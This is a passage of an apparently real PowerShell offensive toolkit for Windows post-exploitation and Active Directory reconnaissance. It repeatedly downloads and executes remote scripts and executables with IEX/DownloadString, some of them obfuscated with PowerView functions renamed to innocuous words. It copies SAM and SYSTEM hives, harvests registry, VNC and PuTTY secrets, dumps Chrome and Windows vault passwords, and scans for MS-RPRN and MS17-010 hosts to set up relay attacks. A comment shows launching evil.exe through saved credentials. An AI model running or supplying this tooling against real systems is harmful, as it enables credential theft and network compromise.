Get-DnsClientServerAddress -AddressFamily IPv4 | ft >> "$currentPath\LocalRecon\DNSServers.txt"
Get-NetRoute -AddressFamily IPv4 | ft DestinationPrefix,NextHop,RouteMetric,ifIndex >> "$currentPath\LocalRecon\NetRoutes.txt"
Get-NetNeighbor -AddressFamily IPv4 | ft ifIndex,IPAddress,LinkLayerAddress,State >> "$currentPath\LocalRecon\ArpTable.txt"
netstat -ano >> "$currentPath\LocalRecon\ActiveConnections.txt"
Get-ChildItem 'HKLM:\SOFTWARE\Microsoft\NET Framework Setup\NDP' -Recurse | Get-ItemProperty -Name Version, Release -ErrorAction 0 | where { $_.PSChildName -match '^(?!S)\p{L}'} | select PSChildName, Version, Release >> "$currentPath\LocalRecon\InstalledDotNetVersions"
Write-Host -ForegroundColor Yellow 'Getting Shares'
net share >> "$currentPath\LocalRecon\Networkshares.txt"
Write-Host -ForegroundColor Yellow 'Getting hosts file content'
get-content $env:windir\System32\drivers\etc\hosts | out-string >> "$currentPath\LocalRecon\etc_Hosts_Content.txt"
Get-ChildItem -Path HKLM:\Software\*\Shell\open\command\ >> "$currentPath\LocalRecon\Test_for_Argument_Injection.txt"
Write-Host -ForegroundColor Yellow 'Searching for files with Full Control and Modify Access'
Function Get-FireWallRule
{
Param ($Name, $Direction, $Enabled, $Protocol, $profile, $action, $grouping)
$Rules=(New-object -comObject HNetCfg.FwPolicy2).rules
If ($name) {$rules= $rules | where-object {$_.name -like $name}}
If ($direction) {$rules= $rules | where-object {$_.direction -eq $direction}}
If ($Enabled) {$rules= $rules | where-object {$_.Enabled -eq $Enabled}}
If ($protocol) {$rules= $rules | where-object {$_.protocol -eq $protocol}}
If ($profile) {$rules= $rules | where-object {$_.Profiles -bAND $profile}}
If ($Action) {$rules= $rules | where-object {$_.Action -eq $Action}}
If ($Grouping) {$rules= $rules | where-object {$_.Grouping -like $Grouping}}
$rules
}
Get-firewallRule -enabled $true | sort direction,name | format-table -property Name,localPorts,direction | out-string -Width 4096 >> "$currentPath\LocalRecon\Firewall_Rules.txt"
$output = " Files with Full Control and Modify Access`r`n"
$output = $output + "-----------------------------------------------------------`r`n"
$files = get-childitem C:\
foreach ($file in $files)
{
try {
$output = $output + (get-childitem "C:\$file" -include *.ps1,*.bat,*.com,*.vbs,*.txt,*.html,*.conf,*.rdp,.*inf,*.ini -recurse -EA SilentlyContinue | get-acl -EA SilentlyContinue | select path -expand access |
where {$_.identityreference -notmatch "BUILTIN|NT AUTHORITY|EVERYONE|CREATOR OWNER|NT SERVICE"} | where {$_.filesystemrights -match "FullControl|Modify"} |
ft @{Label="";Expression={Convert-Path $_.Path}} -hidetableheaders -autosize | out-string -Width 4096)
}
catch
{
$output = $output + "`nFailed to read more files`r`n"
}
}
Write-Host -ForegroundColor Yellow 'Searching for folders with Full Control and Modify Access'
$output = $output + "-----------------------------------------------------------`r`n"
$output = $output + " Folders with Full Control and Modify Access`r`n"
$output = $output + "-----------------------------------------------------------`r`n"
$folders = get-childitem C:\
foreach ($folder in $folders)
{
try
{
$output = $output + (Get-ChildItem -Recurse "C:\$folder" -EA SilentlyContinue | ?{ $_.PSIsContainer} | get-acl | select path -expand access |
where {$_.identityreference -notmatch "BUILTIN|NT AUTHORITY|CREATOR OWNER|NT SERVICE"} | where {$_.filesystemrights -match "FullControl|Modify"} |
select path,filesystemrights,IdentityReference | ft @{Label="";Expression={Convert-Path $_.Path}} -hidetableheaders -autosize | out-string -Width 4096)
}
catch
{
$output = $output + "`nFailed to read more folders`r`n"
}
}
$output >> "$currentPath\LocalRecon\Files_and_Folders_with_Full_Modify_Access.txt"
Write-Host -ForegroundColor Yellow 'Checking for potential sensitive user files'
get-childitem "C:\Users\" -recurse -Include *.zip,*.rar,*.7z,*.gz,*.conf,*.rdp,*.kdbx,*.crt,*.pem,*.ppk,*.txt,*.xml,*.vnc.*.ini,*.vbs,*.bat,*.ps1,*.cmd -EA SilentlyContinue | %{$_.FullName } | out-string >> "$currentPath\LocalRecon\Potential_Sensitive_User_Files.txt"
Write-Host -ForegroundColor Yellow 'Checking AlwaysInstallElevated'
$HKLM = "HKLM:\SOFTWARE\Policies\Microsoft\Windows\Installer"
$HKCU = "HKCU:\SOFTWARE\Policies\Microsoft\Windows\Installer"
if (($HKLM | test-path) -eq "True")
{
if (((Get-ItemProperty -Path $HKLM -Name AlwaysInstallElevated).AlwaysInstallElevated) -eq 1)
{
echo "AlwaysInstallElevated enabled on this host!" >> "$currentPath\Vulnerabilities\AlwaysInstallElevatedactive.txt"
}
}
if (($HKCU | test-path) -eq "True")
{
if (((Get-ItemProperty -Path $HKLM -Name AlwaysInstallElevated).AlwaysInstallElevated) -eq 1)
{
echo "AlwaysInstallElevated enabled on this host!" >> "$currentPath\Vulnerabilities\AlwaysInstallElevatedactive.txt"
}
}
Write-Host -ForegroundColor Yellow 'Checking if Netbios is active'
$EnabledNics= @(gwmi -query "select * from win32_networkadapterconfiguration where IPEnabled='true'")
$OutputObj = @()
foreach ($Network in $EnabledNics)
{
If($network.tcpipnetbiosoptions)
{
$netbiosEnabled = [bool]$network
if ($netbiosEnabled){Write-Host 'Netbios is active, vulnerability found.'; echo "Netbios Active, check localrecon folder for network interface Info" >> "$currentPath\Vulnerabilities\NetbiosActive.txt"}
}
$nic = gwmi win32_networkadapter | where {$_.index -match $network.index}
$OutputObj += @{
Nic = $nic.netconnectionid
NetBiosEnabled = $netbiosEnabled
}
}
$out = $OutputObj | % { new-object PSObject -Property $_} | select Nic, NetBiosEnabled| ft -auto
$out >> "$currentPath\LocalRecon\NetbiosInterfaceInfo.txt"
Write-Host -ForegroundColor Yellow 'Checking if IPv6 is active (mitm6 attacks)'
$IPV6 = $false
$arrInterfaces = (Get-WmiObject -class Win32_NetworkAdapterConfiguration -filter "ipenabled = TRUE").IPAddress
foreach ($i in $arrInterfaces) {$IPV6 = $IPV6 -or $i.contains(":")}
if ($IPV6){Write-Host 'IPv6 enabled, thats another vulnerability (mitm6)'; echo "IPv6 enabled, check all interfaces for the specific NIC" >> "$currentPath\Vulnerabilities\IPv6_Enabled.txt" }
Write-Host -ForegroundColor Yellow 'Collecting installed Software informations'
Get-Installedsoftware -Property DisplayVersion,InstallDate | out-string -Width 4096 >> "$currentPath\LocalRecon\InstalledSoftwareAll.txt"
iex (new-object net.webclient).downloadstring('https://raw.githubusercontent.com/SecureThisShit/Creds/master/PowershellScripts/Invoke-Vulmap.ps1')
Write-Host -ForegroundColor Yellow 'Checking if Software is outdated and therefore vulnerable / exploitable'
Invoke-Vulmap | out-string -Width 4096 >> "$currentPath\Vulnerabilities\VulnerableSoftware.txt"
$passhunt = Read-Host -Prompt 'Do you want to search for Passwords on this system using passhunt.exe? (Its worth it) (yes/no)'
if ($passhunt -eq "yes" -or $passhunt -eq "y" -or $passhunt -eq "Yes" -or $passhunt -eq "Y")
{
passhunt -local $true
}
# Collecting more information
Write-Host -ForegroundColor Yellow 'Checking for accesible SAM/SYS Files'
If (Test-Path -Path 'Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SNMP'){Get-ChildItem -path 'Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SNMP' -Recurse >> "$currentPath\LocalRecon\SNMP.txt"}
If (Test-Path -Path %SYSTEMROOT%\repair\SAM){Write-Host -ForegroundColor Yellow "SAM File reachable, looking for SYS?";copy %SYSTEMROOT%\repair\SAM "$currentPath\Vulnerabilities\SAM"}
If (Test-Path -Path %SYSTEMROOT%\System32\config\SAM){Write-Host -ForegroundColor Yellow "SAM File reachable, looking for SYS?";copy %SYSTEMROOT%\System32\config\SAM "$currentPath\Vulnerabilities\SAM"}
If (Test-Path -Path %SYSTEMROOT%\System32\config\RegBack\SAM){Write-Host -ForegroundColor Yellow "SAM File reachable, looking for SYS?";copy %SYSTEMROOT%\System32\config\RegBack\SAM "$currentPath\Vulnerabilities\SAM"}
If (Test-Path -Path %SYSTEMROOT%\System32\config\SAM){Write-Host -ForegroundColor Yellow "SAM File reachable, looking for SYS?";copy %SYSTEMROOT%\System32\config\SAM "$currentPath\Vulnerabilities\SAM"}
If (Test-Path -Path %SYSTEMROOT%\repair\system){Write-Host -ForegroundColor Yellow "SYS File reachable, looking for SAM?";copy %SYSTEMROOT%\repair\system "$currentPath\Vulnerabilities\SYS"}
If (Test-Path -Path %SYSTEMROOT%\System32\config\SYSTEM){Write-Host -ForegroundColor Yellow "SYS File reachable, looking for SAM?";copy %SYSTEMROOT%\System32\config\SYSTEM "$currentPath\Vulnerabilities\SYS"}
If (Test-Path -Path %SYSTEMROOT%\System32\config\RegBack\system){Write-Host -ForegroundColor Yellow "SYS File reachable, looking for SAM?";copy %SYSTEMROOT%\System32\config\RegBack\system "$currentPath\Vulnerabilities\SYS"}
Write-Host -ForegroundColor Yellow 'Checking Registry for potential passwords'
REG QUERY HKLM /F "passwor" /t REG_SZ /S /K >> "$currentPath\LocalRecon\PotentialHKLMRegistryPasswords.txt"
REG QUERY HKCU /F "password" /t REG_SZ /S /K >> "$currentPath\LocalRecon\PotentialHKCURegistryPasswords.txt"
Write-Host -ForegroundColor Yellow 'Checking sensitive registry entries..'
If (Test-Path -Path 'Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon')
{
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" >> "$currentPath\LocalRecon\Winlogon.txt"
}
If (Test-Path -Path 'Registry::HKEY_LOCAL_MACHINE\SYSTEM\Current\ControlSet\Services\SNMP'){reg query "HKLM\SYSTEM\Current\ControlSet\Services\SNMP" >> "$currentPath\LocalRecon\SNMPParameters.txt"}
If (Test-Path -Path 'Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Software\SimonTatham\PuTTY\Sessions'){reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" >> "$currentPath\Vulnerabilities\PuttySessions.txt"}
If (Test-Path -Path 'Registry::HKEY_CURRENT_USER\Software\ORL\WinVNC3\Password'){reg query "HKCU\Software\ORL\WinVNC3\Password" >> "$currentPath\Vulnerabilities\VNCPassword.txt"}
If (Test-Path -Path 'Registry::HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4'){reg query HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4 /v password >> "$currentPath\Vulnerabilities\RealVNCPassword.txt"}
If (Test-Path -Path C:\unattend.xml){copy C:\unattend.xml "$currentPath\Vulnerabilities\unattended.xml"; Write-Host -ForegroundColor Yellow 'Unattended.xml Found, check it for passwords'}
If (Test-Path -Path C:\Windows\Panther\Unattend.xml){copy C:\Windows\Panther\Unattend.xml "$currentPath\Vulnerabilities\unattended.xml"; Write-Host -ForegroundColor Yellow 'Unattended.xml Found, check it for passwords'}
If (Test-Path -Path C:\Windows\Panther\Unattend\Unattend.xml){copy C:\Windows\Panther\Unattend\Unattend.xml "$currentPath\Vulnerabilities\unattended.xml"; Write-Host -ForegroundColor Yellow 'Unattended.xml Found, check it for passwords'}
If (Test-Path -Path C:\Windows\system32\sysprep.inf){copy C:\Windows\system32\sysprep.inf "$currentPath\Vulnerabilities\sysprep.inf"; Write-Host -ForegroundColor Yellow 'Sysprep.inf Found, check it for passwords'}
If (Test-Path -Path C:\Windows\system32\sysprep\sysprep.xml){copy C:\Windows\system32\sysprep\sysprep.xml "$currentPath\Vulnerabilities\sysprep.inf"; Write-Host -ForegroundColor Yellow 'Sysprep.inf Found, check it for passwords'}
Get-Childitem -Path C:\inetpub\ -Include web.config -File -Recurse -ErrorAction SilentlyContinue >> "$currentPath\Vulnerabilities\webconfigfiles.txt"
Write-Host -ForegroundColor Yellow 'List running tasks'
Get-WmiObject -Query "Select * from Win32_Process" | where {$_.Name -notlike "svchost*"} | Select Name, Handle, @{Label="Owner";Expression={$_.GetOwner().User}} | ft -AutoSize >> "$currentPath\LocalRecon\RunningTasks.txt"
Write-Host -ForegroundColor Yellow 'Checking for usable credentials (cmdkey /list)'
cmdkey /list >> "$currentPath\Vulnerabilities\SavedCredentials.txt" # runas /savecred /user:WORKGROUP\Administrator "\\10.XXX.XXX.XXX\SHARE\evil.exe"
$dotnet = Read-Host -Prompt 'Do you want to search for .NET Binaries on this system? (theese can be easily reverse engineered for vulnerability analysis) (yes/no)'
if ($dotnet -eq "yes" -or $dotnet -eq "y" -or $dotnet -eq "Yes" -or $dotnet -eq "Y")
{
Write-Host -ForegroundColor Yellow 'Searching for Files - Output is saved to the localrecon folder:'
iex (new-object net.webclient).downloadstring('https://raw.githubusercontent.com/SecureThisShit/Creds/master/PowershellScripts/Get-DotNetServices.ps1')
Get-DotNetServices >> "$currentPath\LocalRecon\DotNetBinaries.txt"
}
if (isadmin)
{
invoke-expression 'cmd /c start powershell -Command {$Wcl = new-object System.Net.WebClient;$Wcl.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials;IEX(New-Object Net.WebClient).DownloadString(''https://raw.githubusercontent.com/threatexpress/red-team-scripts/master/HostEnum.ps1'');Invoke-HostEnum >> .\LocalRecon\HostEnum.txt}'
$PSrecon = Read-Host -Prompt 'Do you want to gather local computer Informations with PSRecon? (yes/no)'
if ($PSrecon -eq "yes" -or $PSrecon -eq "y" -or $PSrecon -eq "Yes" -or $PSrecon -eq "Y")
{
invoke-expression 'cmd /c start powershell -Command {$Wcl = new-object System.Net.WebClient;$Wcl.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials;Invoke-WebRequest -Uri ''https://raw.githubusercontent.com/gfoss/PSRecon/master/psrecon.ps1'' -Outfile .\LocalRecon\Psrecon.ps1;Write-Host -ForegroundColor Yellow ''Starting PsRecon:'';.\LocalRecon\Psrecon.ps1;pause}'
}
Write-Host -ForegroundColor Yellow 'Saving general computer information to .\LocalRecon\Computerdetails.txt:'
Get-ComputerDetails >> "$currentPath\LocalRecon\Computerdetails.txt"
Write-Host -ForegroundColor Yellow 'Starting WINSpect:'
invoke-expression 'cmd /c start powershell -Command {$Wcl = new-object System.Net.WebClient;$Wcl.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials;IEX (New-Object Net.WebClient).DownloadString(''https://raw.githubusercontent.com/A-mIn3/WINspect/master/WINspect.ps1'');}'
}
$session = Read-Host -Prompt 'Do you want to start SessionGopher module? (yes/no)'
if ($session -eq "yes" -or $session -eq "y" -or $session -eq "Yes" -or $session -eq "Y")
{
sessionGopher
}
$search = Read-Host -Prompt 'Do you want to search for sensitive files on this local system? (config files, rdp files, password files and more) (yes/no) - takes a lot of time'
if ($search -eq "yes" -or $search -eq "y" -or $search -eq "Yes" -or $search -eq "Y")
{
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/SecureThisShit/Creds/master/obfuscatedps/find-interesting.ps1')
Write-Host -ForegroundColor Yellow 'Looking for interesting files:'
Find-InterestingFile -Path 'C:\' -Outfile "$currentPath\LocalRecon\InterestingFiles.txt"
Find-InterestingFile -Path 'C:\' -Terms pass,login,rdp,kdbx,backup -Outfile "$currentPath\LocalRecon\MoreFiles.txt"
}
$chrome = Read-Host -Prompt 'Dump Chrome Browser history and maybe passwords? (yes/no)'
if ($chrome -eq "yes" -or $chrome -eq "y" -or $chrome -eq "Yes" -or $chrome -eq "Y")
{
iex (new-object net.webclient).downloadstring('https://raw.githubusercontent.com/SecureThisShit/Creds/master/PowershellScripts/Get-ChromeDump.ps1')
Install-SqlLiteAssembly
Get-ChromeDump >> "$currentPath\Exploitation\Chrome_Credentials.txt"
Get-ChromeHistory >> "$currentPath\LocalRecon\ChromeHistory.txt"
Write-Host -ForegroundColor Yellow 'Done, look in the localrecon folder for creds/history:'
}
$IE = Read-Host -Prompt 'Dump IE / Edge Browser passwords? (yes/no)'
if ($IE -eq "yes" -or $IE -eq "y" -or $IE -eq "Yes" -or $IE -eq "Y")
{
[void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime]
$vault = New-Object Windows.Security.Credentials.PasswordVault
$vault.RetrieveAll() | % { $_.RetrievePassword();$_ } >> "$currentPath\Exploitation\InternetExplorer_Credentials.txt"
}
$browserinfos = Read-Host -Prompt 'Dump all installed Browser history and bookmarks? (yes/no)'
if ($browserinfos -eq "yes" -or $browserinfos -eq "y" -or $browserinfos -eq "Yes" -or $browserinfos -eq "Y")
{
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/SecureThisShit/Creds/master/PowershellScripts/Get-BrowserInformation.ps1')
Get-BrowserInformation >> "$currentPath\LocalRecon\AllBrowserHistory.txt"
}
}
function passhunt
{
<#
.DESCRIPTION
Search for hashed or cleartext passwords on the local system or on the domain.
Author: @SecureThisShit
License: BSD 3-Clause
#>
#Local/Domain Recon / Privesc
Param
(
[bool]
$local,
[bool]
$domain
)
pathcheck
$currentPath = (Get-Item -Path ".\" -Verbose).FullName
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/SecureThisShit/Creds/master/obfuscatedps/viewdevobfs.ps1')
if ($domain)
{
Write-Host -ForegroundColor Yellow 'Collecting active Windows Servers from the domain...'
$ActiveServers = Get-DomainComputer -Ping -OperatingSystem "Windows Server*"
$ActiveServers.dnshostname >> "$currentPath\DomainRecon\activeservers.txt"
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/SecureThisShit/Creds/master/obfuscatedps/viewobfs.ps1')
Write-Host -ForegroundColor Yellow 'Searching for Shares on the found Windows Servers...'
brainstorm -ComputerFile "$currentPath\DomainRecon\activeservers.txt" -NoPing -CheckShareAccess | Out-File -Encoding ascii "$currentPath\DomainRecon\found_shares.txt"
$shares = Get-Content "$currentPath\DomainRecon\found_shares.txt"
$testShares = foreach ($line in $shares){ echo ($line).Split(' ')[0]}
Write-Host -ForegroundColor Yellow 'Starting Passhunt.exe for all found shares.'
if (test-path $currentPath\passhunt.exe)
{
foreach ($line in $testShares)
{
cmd /c start powershell -Command "$currentPath\passhunt.exe -s $line"
}
}
else
{
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
Invoke-WebRequest -Uri 'https://github.com/SecureThisShit/Creds/blob/master/exeFiles/passhunt.exe' -Outfile $currentPath\passhunt.exe
foreach ($line in $shares)
{
cmd /c start powershell -Command "$currentPath\passhunt.exe -s $line"
}
}
}
if ($local)
{
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
Invoke-WebRequest -Uri 'https://github.com/SecureThisShit/Creds/blob/master/exeFiles/passhunt.exe' -Outfile $currentPath\passhunt.exe
cmd /c start powershell -Command "$currentPath\passhunt.exe"
$sharepasshunt = Read-Host -Prompt 'Do you also want to search for Passwords on all connected networkshares?'
if ($sharepasshunt -eq "yes" -or $sharepasshunt -eq "y" -or $sharepasshunt -eq "Yes" -or $sharepasshunt -eq "Y")
{
get-WmiObject -class Win32_Share | ft Path >> passhuntshares.txt
$shares = get-content .\passhuntshares.txt | select-object -skip 4
foreach ($line in $shares)
{
cmd /c start powershell -Command "$currentPath\passhunt.exe -s $line"
}
}
}
else
{
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
Invoke-WebRequest -Uri 'https://github.com/SecureThisShit/Creds/blob/master/exeFiles/passhunt.exe' -Outfile $currentPath\passhunt.exe
cmd /c start powershell -Command "$currentPath\passhunt.exe"
}
}
function domainreconmodules
{
<#
.DESCRIPTION
All domain recon scripts are executed here.
Author: @securethisshit
License: BSD 3-Clause
#>
#Domain / Network Reconing
$currentPath = (Get-Item -Path ".\" -Verbose).FullName
pathcheck
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/SecureThisShit/Creds/master/PowershellScripts/DomainPasswordSpray.ps1')
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/SecureThisShit/Creds/master/obfuscatedps/view.ps1')
$domain_Name = skulked
$Domain = $domain_Name.Name
Write-Host -ForegroundColor Yellow 'Starting Domain Recon phase:'
Write-Host -ForegroundColor Yellow 'Creating Domain User-List:'
Get-DomainUserList -Domain $domain_Name.Name -RemoveDisabled -RemovePotentialLockouts | Out-File -Encoding ascii "$currentPath\DomainRecon\userlist.txt"
Write-Host -ForegroundColor Yellow 'Searching for Exploitable Systems:'
inset >> "$currentPath\DomainRecon\ExploitableSystems.txt"
#Powerview
Write-Host -ForegroundColor Yellow 'All those PowerView Network Skripts for later Lookup getting executed and saved:'
try{
skulked >> "$currentPath\DomainRecon\NetDomain.txt"
televisions >> "$currentPath\DomainRecon\NetForest.txt"
misdirects >> "$currentPath\DomainRecon\NetForestDomain.txt"
odometer >> "$currentPath\DomainRecon\NetDomainController.txt"
Houyhnhnm >> "$currentPath\DomainRecon\NetUser.txt"
Randal >> "$currentPath\DomainRecon\NetSystems.txt"
Get-Printer >> "$currentPath\DomainRecon\localPrinter.txt"
damsels >> "$currentPath\DomainRecon\NetOU.txt"
xylophone >> "$currentPath\DomainRecon\NetSite.txt"
ignominies >> "$currentPath\DomainRecon\NetSubnet.txt"
reapportioned >> "$currentPath\DomainRecon\NetGroup.txt"
confessedly >> "$currentPath\DomainRecon\NetGroupMember.txt"
aqueduct >> "$currentPath\DomainRecon\NetFileServer.txt"
marinated >> "$currentPath\DomainRecon\DFSshare.txt"
liberation >> "$currentPath\DomainRecon\NetShare.txt"
cherubs >> "$currentPath\DomainRecon\NetLoggedon"
Trojans >> "$currentPath\DomainRecon\Domaintrusts.txt"
sequined >> "$currentPath\DomainRecon\ForestTrust.txt"
ringer >> "$currentPath\DomainRecon\ForeignUser.txt"
condor >> "$currentPath\DomainRecon\ForeignGroup.txt"
}catch{Write-Host "Got an error"}
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/SecureThisShit/Creds/master/obfuscatedps/viewdevobfs.ps1')
breviaries -Printers >> "$currentPath\DomainRecon\DomainPrinters.txt"
IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/SecureThisShit/Creds/master/PowershellScripts/SPN-Scan.ps1')
Discover-PSInterestingServices >> "$currentPath\DomainRecon\SPNScan_InterestingServices.txt"
#Search for AD-Passwords in description fields
Write-Host -ForegroundColor Yellow 'Searching for passwords in active directory description fields..'
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
Invoke-Webrequest -Uri 'https://github.com/SecureThisShit/Creds/raw/master/Microsoft.ActiveDirectory.Management.dll' -Outfile "$currentPath\Microsoft.ActiveDirectory.Management.dll"
Import-Module .\Microsoft.ActiveDirectory.Management.dll
iex (new-object net.webclient).downloadstring('https://raw.githubusercontent.com/SecureThisShit/Creds/master/obfuscatedps/adpass.ps1')
thyme >> "$currentPath\DomainRecon\Passwords_in_description.txt"
Write-Host -ForegroundColor Yellow 'Searching for Users without password Change for a long time'
$Date = (Get-Date).AddYears(-1).ToFileTime()
prostituted -LDAPFilter "(pwdlastset<=$Date)" -Properties samaccountname,pwdlastset >> "$currentPath\DomainRecon\Users_Nochangedpassword.txt"
prostituted -LDAPFilter "(!userAccountControl:1.2.840.113556.1.4.803:=2)" -Properties distinguishedname >> "$currentPath\DomainRecon\Enabled_Users.txt"
prostituted -UACFilter NOT_ACCOUNTDISABLE -Properties distinguishedname >> "$currentPath\DomainRecon\Enabled_Users.txt"
Write-Host -ForegroundColor Yellow 'Searching for Unconstrained delegation Systems and Users'
$Computers = breviaries -Unconstrained >> "$currentPath\DomainRecon\Unconstrained_Systems.txt"
$Users = prostituted -AllowDelegation -AdminCount >> "$currentPath\DomainRecon\AllowDelegationUsers.txt"
Write-Host -ForegroundColor Yellow 'Identify kerberos and password policy..'
$DomainPolicy = forsakes -Policy Domain
$DomainPolicy.KerberosPolicy >> "$currentPath\DomainRecon\Kerberospolicy.txt"
$DomainPolicy.SystemAccess >> "$currentPath\DomainRecon\Passwordpolicy.txt"
Write-Host -ForegroundColor Yellow 'Searching for Systems we have RDP access to..'
rewires -LocalGroup RDP -Identity >> "$currentPath\DomainRecon\RDPAccess_Systems.txt"
$session = Read-Host -Prompt 'Do you want to search for potential sensitive domain share files - can take a while? (yes/no)'
if ($session -eq "yes" -or $session -eq "y" -or $session -eq "Yes" -or $session -eq "Y")
{
mangers >> "$currentPath\DomainRecon\InterestingDomainshares.txt"
}
$aclight = Read-Host -Prompt 'Starting ACLAnalysis for Shadow Admin detection? (yes/no)'
if ($aclight -eq "yes" -or $aclight -eq "y" -or $aclight -eq "Yes" -or $aclight -eq "Y")
{
Write-Host -ForegroundColor Yellow 'Starting ACLAnalysis for Shadow Admin detection:'
invoke-expression 'cmd /c start powershell -Command {$Wcl = new-object System.Net.WebClient;$Wcl.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials;IEX(New-Object Net.WebClient).DownloadString(''https://raw.githubusercontent.com/SecureThisShit/ACLight/master/ACLight2/ACLight2.ps1'');Start-ACLsAnalysis;Write-Host -ForegroundColor Yellow ''Moving Files:'';mv C:\Results\ .\DomainRecon\;}'
}
$powersql = Read-Host -Prompt 'Start PowerUpSQL Checks? (yes/no)'
if ($powersql -eq "yes" -or $powersql -eq "y" -or $powersql -eq "Yes" -or $powersql -eq "Y")
{
powerSQL
}
$spoolscan = Read-Host -Prompt 'Start MS-RPRN RPC Service Scan? (yes/no)'
if ($spoolscan -eq "yes" -or $spoolscan -eq "y" -or $spoolscan -eq "Yes" -or $spoolscan -eq "Y")
{
Write-Host -ForegroundColor Yellow 'Checking Domain Controllers for MS-RPRN RPC-Service! If its available, you can nearly do DCSync.' #https://www.slideshare.net/harmj0y/derbycon-the-unintended-risks-of-trusting-active-directory
iex (new-object net.webclient).downloadstring('https://raw.githubusercontent.com/SecureThisShit/SpoolerScanner/master/SpoolerScan.ps1')
$domcontrols = terracing
foreach ($domc in $domcontrols.IPAddress)
{
try{
if (spoolscan -target $domc)
{
Write-Host -ForegroundColor Yellow 'Found vulnerable DC. You can take the DC-Hash for SMB-Relay attacks now'
echo "$domc" >> "$currentPath\Vulnerabilities\MS-RPNVulnerableDC.txt"
}
}catch{Write-Host "Got an error"}
}
$othersystems = Read-Host -Prompt 'Start MS-RPRN RPC Service Scan for other active Windows Servers in the domain? (yes/no)'
if ($othersystems -eq "yes" -or $othersystems -eq "y" -or $othersystems -eq "Yes" -or $othersystems -eq "Y")
{
Write-Host -ForegroundColor Yellow 'Searching for active Servers in the domain, this can take a while depending on the domain size'
$ActiveServers = breviaries -Ping -OperatingSystem "Windows Server*"
foreach ($acserver in $ActiveServers.dnshostname)
{
try{
if (spoolscan -target $acserver)
{
Write-Host -ForegroundColor Yellow 'Found vulnerable Server - $acserver. You can take the DC-Hash for SMB-Relay attacks now'
echo "$acserver" >> "$currentPath\Vulnerabilities\MS-RPNVulnerableServers.txt"
}
}catch{Write-Host "Got an error"}
}
}
}
$ms1710 = Read-Host -Prompt 'Search for MS17-10 vulnerable Windows Servers in the domain? (yes/no)'
if ($ms1710 -eq "yes" -or $ms1710 -eq "y" -or $ms1710 -eq "Yes" -or $ms1710 -eq "Y")
{
MS17-10
}
$domainsharepass = Read-Host -Prompt 'Check Domain Network-Shares for cleartext passwords using passhunt.exe? (yes/no)'
if ($domainsharepass -eq "yes" -or $domainsharepass -eq "y" -or $domainsharepass -eq "Yes" -or $domainsharepass -eq "Y")
{
passhunt -domain $true
}
$gpos = Read-Host -Prompt 'Check domain Group policies for common misconfigurations using Grouper2? (yes/no)'
if ($gpos -eq "yes" -or $gpos -eq "y" -or $gpos -eq "Yes" -or $gpos -eq "Y")
{
GPOAudit
}
}
function GPOAudit
{
<#
.DESCRIPTION
Check Group Policies for common misconfigurations using Grouper2.
Author: @securethisshit
License: BSD 3-Clause
#>
#Domain Recon
$currentPath = (Get-Item -Path ".\" -Verbose).FullName
pathcheck
iex (new-object net.webclient).downloadstring('https://raw.githubusercontent.com/SecureThisShit/Invoke-Sharpcradle/master/Invoke-Sharpcradle.ps1')
Invoke-Sharpcradle -uri https://github.com/SecureThisShit/Creds/blob/master/Ghostpack/Grouper2.exe?raw=true -argument1 "-f" -argument2 "$currentPath\DomainRecon\GPOAudit.html"
}
function reconAD